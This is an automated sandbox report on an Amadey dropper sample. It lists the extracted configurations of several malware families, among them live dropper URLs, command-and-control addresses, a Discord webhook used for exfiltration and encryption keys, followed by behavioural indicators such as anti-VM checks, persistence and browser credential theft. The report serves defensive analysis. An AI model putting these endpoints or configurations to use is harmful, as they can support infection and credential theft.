amadey | 1791b49625ea67a1035252f25b155627617e3c49053aa14012b6d194e60ccf5b

Analysis

max time kernel
141s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
22/03/2025, 12:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

938KB
MD5

37de732974e6a068089e610463dfcf8d
SHA1

06408e46cbed44313d25ca507d2e1c4b4153f483
SHA256

1791b49625ea67a1035252f25b155627617e3c49053aa14012b6d194e60ccf5b
SHA512

56136a23d177ceb2181f1301b426e459bac7096d0eb9d198f8cba11692ac2c7dbe34f11f578cc518ac0bc078343191b9b167f7f167fda4bde646f9e48bee8232
SSDEEP

24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:NTvC/MTQYxsWR7a0X

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

skuld

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

xworm

Version

5.0

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

amadey

Version

5.33

Botnet

06bcb9

http://195.82.146.131

Attributes

install_dir
06a5c50e21
install_file
tgvazx.exe
strings_key
1861b156ffe931ec912bb17b5ff77a36
url_paths
/h8ejjcsDs/index.php

rc4.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

212.56.35.232:101

Mutex

QSR_MUTEX_L5s39LpA1y9H79tL6D

Attributes

encryption_key
oBOMHICrtHceojCPrnpp
install_name
svchost.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svchosta
subdirectory
media

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 6 IoCs

stealer

resource	yara_rule
behavioral2/memory/5076-809-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7
behavioral2/memory/5076-810-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7
behavioral2/memory/5076-929-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7
behavioral2/memory/5076-1306-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7
behavioral2/memory/5076-1310-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7
behavioral2/memory/5076-1314-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/memory/4560-801-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral2/memory/3708-887-0x0000000009F60000-0x000000000A3F6000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/4376-24368-0x00000000006F0000-0x000000000074E000-memory.dmp	family_quasar

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 388 created 2656	388	Organizations.com	44

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	advnrNo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	RrRYo50.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempG49HNF6NCVMSRINZLKD2B5EOPLEDEOOG.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	tgvazx.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
23	3708	powershell.exe
111	3708	powershell.exe
270	3708	powershell.exe
310	7164	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
7164	powershell.exe
7076	powershell.exe
3708	powershell.exe
3708	powershell.exe
5860	powershell.exe
7068	powershell.exe
816	powershell.exe
5860	powershell.exe
8320	powershell.exe
5512	powershell.exe
2780	powershell.exe
7040	powershell.exe

Downloads MZ/PE file 16 IoCs

flow	pid	Process
82	4652	rapes.exe
82	4652	rapes.exe
295	5832	svchost.exe
307	7060	tgvazx.exe
291	4652	rapes.exe
292	4652	rapes.exe
310	7164	powershell.exe
36	4652	rapes.exe
36	4652	rapes.exe
36	4652	rapes.exe
294	4652	rapes.exe
294	4652	rapes.exe
294	4652	rapes.exe
294	4652	rapes.exe
23	3708	powershell.exe
277	4652	rapes.exe

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3512	chrome.exe
1084	chrome.exe
4672	chrome.exe
2536	chrome.exe
5180	chrome.exe
1020	msedge.exe
732	msedge.exe
5528	msedge.exe
5144	msedge.exe
4492	msedge.exe

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	tgvazx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempG49HNF6NCVMSRINZLKD2B5EOPLEDEOOG.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	k3t05Da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	advnrNo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RrRYo50.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	tgvazx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	k3t05Da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RrRYo50.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempG49HNF6NCVMSRINZLKD2B5EOPLEDEOOG.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	advnrNo.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	k3t05Da.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	RrRYo50.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	zx4PJh6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	advnrNo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	mshta.exe

Deletes itself 1 IoCs

pid	Process
6172	w32tm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat	cmd.exe

Executes dropped EXE 27 IoCs

pid	Process
3500	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
4652	rapes.exe
3128	50KfF6O.exe
1752	zx4PJh6.exe
388	Organizations.com
2128	k3t05Da.exe
3400	rapes.exe
5076	advnrNo.exe
2148	wjfOfXh.exe
2392	k3t05Da.exe
4560	k3t05Da.exe
5300	Kr9UTz2.exe
5308	OkH8IPF.exe
4604	weC48Q7.exe
296	windowscore.exe
6032	rapes.exe
5332	ARxx7NW.exe
3504	d3jhg_003.exe
1416	0000003619.exe
3244	tK0oYx3.exe
3216	tzutil.exe
6172	w32tm.exe
13124	RrRYo50.exe
7060	tgvazx.exe
1584	02221f1f23.exe
5160	TempG49HNF6NCVMSRINZLKD2B5EOPLEDEOOG.EXE
4376	word.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	advnrNo.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	RrRYo50.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	tgvazx.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	TempG49HNF6NCVMSRINZLKD2B5EOPLEDEOOG.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe

Loads dropped DLL 48 IoCs

pid	Process
2128	k3t05Da.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe
296	windowscore.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral2/files/0x0008000000024122-664.dat	agile_net
behavioral2/memory/2128-677-0x0000000000010000-0x00000000005FC000-memory.dmp	agile_net

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x00060000000227d1-682.dat	themida
behavioral2/memory/2128-686-0x0000000070300000-0x00000000708E0000-memory.dmp	themida
behavioral2/memory/2128-688-0x0000000070300000-0x00000000708E0000-memory.dmp	themida
behavioral2/memory/2128-689-0x0000000070300000-0x00000000708E0000-memory.dmp	themida
behavioral2/memory/2128-733-0x0000000070300000-0x00000000708E0000-memory.dmp	themida
behavioral2/memory/2128-808-0x0000000070300000-0x00000000708E0000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\02221f1f23.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10299110101\\02221f1f23.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10299120121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	50KfF6O.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	k3t05Da.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0003000000009db4-24324.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2044	tasklist.exe
1932	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
3500	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
4652	rapes.exe
3400	rapes.exe
5076	advnrNo.exe
6032	rapes.exe
13124	RrRYo50.exe
7060	tgvazx.exe
5160	TempG49HNF6NCVMSRINZLKD2B5EOPLEDEOOG.EXE

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2128 set thread context of 4560	2128	k3t05Da.exe	147
PID 5300 set thread context of 5396	5300	Kr9UTz2.exe	165
PID 5308 set thread context of 3260	5308	OkH8IPF.exe	186
PID 3244 set thread context of 7116	3244	tK0oYx3.exe	205

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000240ff-55.dat	upx
behavioral2/memory/3128-64-0x0000000000320000-0x0000000000DAE000-memory.dmp	upx
behavioral2/memory/3128-67-0x0000000000320000-0x0000000000DAE000-memory.dmp	upx

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\RuntimeApp\0000003619.exe	ARxx7NW.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\NecessityInfections	zx4PJh6.exe
File opened for modification	C:\Windows\VancouverPulse	zx4PJh6.exe
File opened for modification	C:\Windows\GuaranteesFear	zx4PJh6.exe
File opened for modification	C:\Windows\CylinderPair	zx4PJh6.exe
File opened for modification	C:\Windows\OfficeForbes	zx4PJh6.exe
File created	C:\Windows\Tasks\rapes.job	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
File opened for modification	C:\Windows\SheDrum	zx4PJh6.exe
File opened for modification	C:\Windows\InvestingTr	zx4PJh6.exe
File created	C:\Windows\Tasks\tgvazx.job	RrRYo50.exe
File created	C:\Windows\word.exe	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4584	388	WerFault.exe	121

System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tgvazx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Organizations.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	word.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d3jhg_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wjfOfXh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RrRYo50.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	02221f1f23.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zx4PJh6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	advnrNo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempG49HNF6NCVMSRINZLKD2B5EOPLEDEOOG.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	advnrNo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	advnrNo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
4928	timeout.exe
6180	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133871220232577381"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3400	schtasks.exe
6720	schtasks.exe
8748	schtasks.exe
1584	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3708	powershell.exe
3708	powershell.exe
3500	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
3500	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
4652	rapes.exe
4652	rapes.exe
388	Organizations.com
388	Organizations.com
388	Organizations.com
388	Organizations.com
388	Organizations.com
388	Organizations.com
3400	rapes.exe
3400	rapes.exe
388	Organizations.com
388	Organizations.com
388	Organizations.com
388	Organizations.com
4480	fontdrvhost.exe
4480	fontdrvhost.exe
4480	fontdrvhost.exe
4480	fontdrvhost.exe
5076	advnrNo.exe
5076	advnrNo.exe
5076	advnrNo.exe
5076	advnrNo.exe
2148	wjfOfXh.exe
2148	wjfOfXh.exe
5076	advnrNo.exe
5076	advnrNo.exe
816	powershell.exe
816	powershell.exe
2128	k3t05Da.exe
2128	k3t05Da.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
816	powershell.exe
816	powershell.exe
3708	powershell.exe
3708	powershell.exe
3708	powershell.exe
5512	powershell.exe
5512	powershell.exe
5512	powershell.exe
6040	powershell.exe
6040	powershell.exe
5076	advnrNo.exe
5076	advnrNo.exe
6040	powershell.exe
5396	MSBuild.exe
5396	MSBuild.exe
5396	MSBuild.exe
5396	MSBuild.exe
5076	advnrNo.exe
5076	advnrNo.exe
5076	advnrNo.exe
5076	advnrNo.exe
3260	MSBuild.exe
3260	MSBuild.exe
3260	MSBuild.exe
3260	MSBuild.exe
5076	advnrNo.exe
5076	advnrNo.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
3504	d3jhg_003.exe
3504	d3jhg_003.exe
3504	d3jhg_003.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
5528	msedge.exe
5528	msedge.exe
5528	msedge.exe
5528	msedge.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	3128	50KfF6O.exe
Token: SeDebugPrivilege	1932	tasklist.exe
Token: SeDebugPrivilege	2044	tasklist.exe
Token: SeDebugPrivilege	2128	k3t05Da.exe
Token: SeDebugPrivilege	816	powershell.exe
Token: SeShutdownPrivilege	3512	chrome.exe
Token: SeCreatePagefilePrivilege	3512	chrome.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeShutdownPrivilege	3512	chrome.exe
Token: SeCreatePagefilePrivilege	3512	chrome.exe
Token: SeDebugPrivilege	4560	k3t05Da.exe
Token: SeShutdownPrivilege	3512	chrome.exe
Token: SeCreatePagefilePrivilege	3512	chrome.exe
